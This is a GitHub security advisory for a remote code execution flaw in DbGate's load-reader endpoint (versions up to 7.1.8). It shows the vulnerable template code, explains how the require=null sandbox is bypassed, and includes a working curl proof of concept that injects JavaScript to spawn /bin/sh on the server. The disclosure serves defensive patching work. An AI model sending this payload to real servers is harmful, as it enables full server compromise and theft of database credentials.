Skip to content

DbGate: Remote Code Execution via functionName injection in loadReader endpoint

High severity GitHub Reviewed Published May 22, 2026 in dbgate/dbgate • Updated Jun 5, 2026

Package

npm dbgate-api (npm)

Affected versions

<= 7.1.8

Patched versions

7.1.9

Description

Summary

The POST /runners/load-reader endpoint in DbGate accepts a functionName parameter that is directly interpolated into a JavaScript code template without any sanitization or validation. An authenticated user (with basic access, no special permissions required) can inject arbitrary JavaScript code that executes on the server with full process privileges, bypassing the require=null sandbox restriction.

Details

The loadReader endpoint in packages/api/src/controllers/runners.js (line 353) takes a functionName parameter from the request body and passes it to compileShellApiFunctionName() which performs no sanitization:

Vulnerable code (permalink):

  loadReader_meta: true,
  async loadReader({ functionName, props }) {
    if (!platformInfo.isElectron) {
      if (props?.fileName && !checkSecureDirectories(props.fileName)) {
        return { errorMessage: 'DBGM-00289 Unallowed file' };
      }
    }
    const prefix = extractShellApiPlugins(functionName)
      .map(packageName => `// @require ${packageName}\n`)
      .join('');

    const promise = new Promise((resolve, reject) => {
      const runid = crypto.randomUUID();
      this.requests[runid] = { resolve, reject, exitOnStreamError: true };
      this.startCore(runid, loaderScriptTemplate(prefix, functionName, props, runid));
    });
    return promise;
  },

The loaderScriptTemplate at line 57-68 directly interpolates the compiled function name:

const loaderScriptTemplate = (prefix, functionName, props, runid) => `
${prefix}
const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
${requirePluginsTemplate(extractShellApiPlugins(functionName, props))}
require=null;
async function run() {
const reader=await ${compileShellApiFunctionName(functionName)}(${JSON.stringify(props)});
const writer=await dbgateApi.collectorWriter({runid: '${runid}'});
await dbgateApi.copyStream(reader, writer);
}
dbgateApi.runScript(run);
`;

The compileShellApiFunctionName in packages/tools/src/packageTools.ts (line 30-35) performs no validation:

export function compileShellApiFunctionName(functionName) {
  const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);
  if (nsMatch) {
    return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;
  }
  return `dbgateApi.${functionName}`;
}

Two injection vectors:

  1. Without @: The entire functionName is appended after dbgateApi. without sanitization
  2. With @: The part before @ (nsMatch[1]) is appended after .shellApi. without sanitization (only the part after @ goes through _camelCase)

Although the script template sets require=null, the process global is still available. process.binding("spawn_sync") provides direct access to spawn child processes, completely bypassing the sandbox.

Compare with safe code in the same file (line 292):

  start_meta: true,
  async start({ script }, req) {
    // ...
    await testStandardPermission('run-shell-script', req);  // <-- Permission check!
    if (!platformInfo.allowShellScripting) {                 // <-- Platform check!
      return { errorMessage: 'DBGM-00286 Shell scripting is not allowed' };
    }
    // ...
  },

The start endpoint requires the run-shell-script permission and checks allowShellScripting. The loadReader endpoint has neither of these checks, making it a privilege escalation from any authenticated user to full RCE.

PoC

An authenticated user sends a POST request to /runners/load-reader with a crafted functionName:

# The malicious functionName breaks out of the expression and injects
# process.binding("spawn_sync") to execute arbitrary commands.
# The // at the end comments out the remaining template code.

curl -X POST http://TARGET:3000/runners/load-reader \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <JWT_TOKEN>" \
  -d '{
    "functionName": "toString();var __r=process.binding(\"spawn_sync\").spawn({file:\"/bin/sh\",args:[\"/bin/sh\",\"-c\",\"id > /tmp/dbgate-rce-proof\"],envPairs:[],stdio:[{type:\"pipe\",readable:true,writable:false},{type:\"pipe\",readable:false,writable:true},{type:\"pipe\",readable:false,writable:true}]});dbgateApi.toString//",
    "props": {}
  }'

This generates the following JavaScript that is forked as a child process:

const dbgateApi = require(process.env.DBGATE_API);
dbgateApi.initializeApiEnvironment();
require=null;
async function run() {
const reader=await dbgateApi.toString();var __r=process.binding("spawn_sync").spawn({file:"/bin/sh",args:["/bin/sh","-c","id > /tmp/dbgate-rce-proof"],envPairs:[],stdio:[{type:"pipe",readable:true,writable:false},{type:"pipe",readable:false,writable:true},{type:"pipe",readable:false,writable:true}]});dbgateApi.toString//({})
// ... rest of template
}
dbgateApi.runScript(run);

After the request, /tmp/dbgate-rce-proof contains the output of id, confirming arbitrary command execution.

A standalone PoC script is available at: reports/cve-hunting/pocs/dbgate/rce_loadreader_functionname_injection.py

Impact

An authenticated user with basic access (no admin role, no run-shell-script permission required) can:

  1. Execute arbitrary OS commands on the DbGate server with the privileges of the Node.js process
  2. Read/write any file accessible to the process
  3. Pivot to connected databases by reading connection credentials from DbGate's storage
  4. Compromise the host system - in Docker deployments, this typically means root access within the container

This is particularly severe because:

  • No special permissions are required beyond basic authentication
  • The require=null sandbox is completely bypassed via process.binding("spawn_sync")
  • The loadReader endpoint lacks the permission checks present on the start endpoint
  • DbGate is commonly deployed as a web-accessible database management tool

References

@Stelinkaa Stelinkaa published to dbgate/dbgate May 22, 2026
Published to the GitHub Advisory Database Jun 5, 2026
Reviewed Jun 5, 2026
Last updated Jun 5, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS score

Weaknesses

Improper Control of Generation of Code ('Code Injection')

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. Learn more on MITRE.

CVE ID

CVE-2026-48017

GHSA ID

GHSA-hv83-ggc4-v385

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.